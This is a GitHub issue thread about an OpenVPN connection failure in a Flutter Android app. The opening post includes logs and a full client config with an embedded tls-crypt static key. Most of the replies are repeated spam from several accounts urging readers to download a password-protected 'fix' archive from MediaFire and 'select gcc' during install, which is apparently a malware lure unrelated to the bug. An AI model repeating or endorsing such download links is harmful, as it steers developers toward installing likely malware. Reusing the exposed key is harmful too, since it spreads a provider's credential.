### ISSUE TITLE
VPN fails to connect without any error message and  android.os.RemoteException: Missing user certificate or user certifcate key file

### ISSUE THREAD

**Issue by WANDIKAPRATAMA** [nizwar/openvpn_flutter#118]
``Hi, can anyone help me solve the Open Vpn connection failure with the server I got from VpnResselers, the problem is that the connection with the server I got from Vpn Resselers failed to connect with the following LOG results:

` [       ] I/flutter (21318): Memulai OpenVPN dengan konfigurasi: Instance of 'VpnConfiguration'
[  +44 ms] I/OpenVPN (21318): Starting openvpn
[  +14 ms] I/OpenVPN (21318): OpenVPN process exited
[  +59 ms] I/OpenVPN (21318): Exiting`

 From the LOG results I didn't get any information regarding what was wrong with the VPN server, here is the VPN server I used:

`client
dev tun
remote fr1.ipcover.net 8080 tcp
auth-user-pass
auth-nocache
nobind
auth SHA256
cipher AES-256-GCM
tls-client
tls-cipher TLS-ECDHE-ECDSA-WITH-AES-256-GCM-SHA384
remote-cert-eku "TLS Web Server Authentication"
persist-key
persist-tun
data-ciphers AES-256-GCM

<tls-crypt>
#
# 2048 bit OpenVPN static key
#
-----BEGIN OpenVPN Static key V1-----
5a406c73bc41f6765ee9f7e082155b66
c7cff844c57e04528166f3b5b3c20330
36ab9a3ef4b8734b938e1e2650be9656
8ec1b72cf32bbe67cc3cf6b87be007b4
10f49fae4266bdbb23925edc725995bc
eaebd017b072738dac55c3309c735a43
7b05c64f4ffcb214ecb4b5ed470f768c
e667f3f678c5da89be34917be1324fde
d515c0ca61762b8a60846ae8939452ec
c9b0dd4bc28df79e8dd9ac975f9098c3
7140c326deee3ed61ce5402cc2ae0293
3a56f68ac2b1148ba661af4970f2c654
791e7cbbf13da7b5819355bd6f43e1b9
93cafbf035d4a187bc9ee3175e706563
3f5ae8f6356b3d33f18dd831235a03d7
a6eea38085fed6927e9a604b82c3ccc1
-----END OpenVPN Static key V1-----
</tls-crypt>

<ca>
-----BEGIN CERTIFICATE-----
MIIB6TCCAW+gAwIBAgIJAO7HEvJxfUUCMAoGCCqGSM49BAMCMBcxFTATBgNVBAMM
DDMyMWludGVyLm5ldDAeFw0xOTA1MjExMzI3NDlaFw0yOTA1MTgxMzI3NDlaMBcx
FTATBgNVBAMMDDMyMWludGVyLm5ldDB2MBAGByqGSM49AgEGBSuBBAAiA2IABGja
TAidcTxY9ud7w3Jr1y6BSS7trkeu3kZqDg/TDCxE4k0Ay6AXVkooORyidfco+SGx
zR8oxcit7JGjCf5+JCufjKjl3s/yULt7gYfQnfBYN4ULcr1gpKCZQMIlORnvHaOB
hjCBgzAdBgNVHQ4EFgQUThoKRpgMcQwcQwlfjfzf5vE2mOUwRwYDVR0jBEAwPoAU
ThoKRpgMcQwcQwlfjfzf5vE2mOWhG6QZMBcxFTATBgNVBAMMDDMyMWludGVyLm5l
dIIJAO7HEvJxfUUCMAwGA1UdEwQFMAMBAf8wCwYDVR0PBAQDAgEGMAoGCCqGSM49
BAMCA2gAMGUCMCL6jOfO1j5lC6q0DN5Z8Aw0GQ5SAFlmlvyAkk1/dGSgA1gzV5/T
4c53qemB1vz4SQIxAN7onHBiSvGwnCePjDSoonHA9CUlWUX9hurwIdFFqLWyRQHn
Nqxoy1tXLIfKApc8CQ==
-----END CERTIFICATE-----
</ca>
` . 

 However I can use this server when trying the Open Vpn GUI marine application, by getting a message that the server does not have a Certificate Profile, in this case does anyone have any information regarding the problem I am facing and how to solve it?

and this is the Log Result when I enter the Config File above manually, while the Log without the error message above appears when using the Config File directly when getting it from the Endpoint API:

`[  +53 ms] W/System.err(14946): android.os.RemoteException: Missing user certificate or user certifcate key file
[   +2 ms] W/System.err(14946):         at com.wandikapratama_sistemkode.vpnapp.MainActivity.startVPN(MainActivity.java:227)
[        ] W/System.err(14946):         at com.wandikapratama_sistemkode.vpnapp.MainActivity.prepareVPN(MainActivity.java:216)
[        ] W/System.err(14946):         at
com.wandikapratama_sistemkode.vpnapp.MainActivity.lambda$configureFlutterEngine$0$com-wandikapratama_sistemkode-vpnapp-M
ainActivity(MainActivity.java:178)
[        ] W/System.err(14946):         at
com.wandikapratama_sistemkode.vpnapp.MainActivity$$ExternalSyntheticLambda0.onMethodCall(Unknown Source:2)
[        ] W/System.err(14946):         at
io.flutter.plugin.common.MethodChannel$IncomingMethodCallHandler.onMessage(MethodChannel.java:267)
[        ] W/System.err(14946):         at io.flutter.embedding.engine.dart.DartMessenger.invokeHandler(DartMessenger.java:292)
[        ] W/System.err(14946):         at
io.flutter.embedding.engine.dart.DartMessenger.lambda$dispatchMessageToQueue$0$io-flutter-embedding-engine-dart-DartMess
enger(DartMessenger.java:319)
[        ] W/System.err(14946):         at io.flutter.embedding.engine.dart.DartMessenger$$ExternalSyntheticLambda0.run(Unknown
Source:12)`

on Open Vpn GUI :
![TroubleOpenVpn_KeyStoreFake](https://github.com/user-attachments/assets/b04e10c4-024f-4d04-8afb-7835e5bdd093)

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by WANDIKAPRATAMA** [comment]
> untuk memperbaiki masalah Anda coba unduh perbaikan ini, saya melihatnya di edisi lain, https://app.mediafire.com/3ag3jpquii3of kata sandi: changeme saat Anda menginstal, Anda perlu memberi tanda centang di jalur instalasi dan pilih "gcc."

Hi, thanks for your reply. What is the contents of the file and what is the relationship between the file after I download it and the problem I am experiencing?

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by HarshMishra-3456** [comment]
The file is no longer there, facing the same issue.
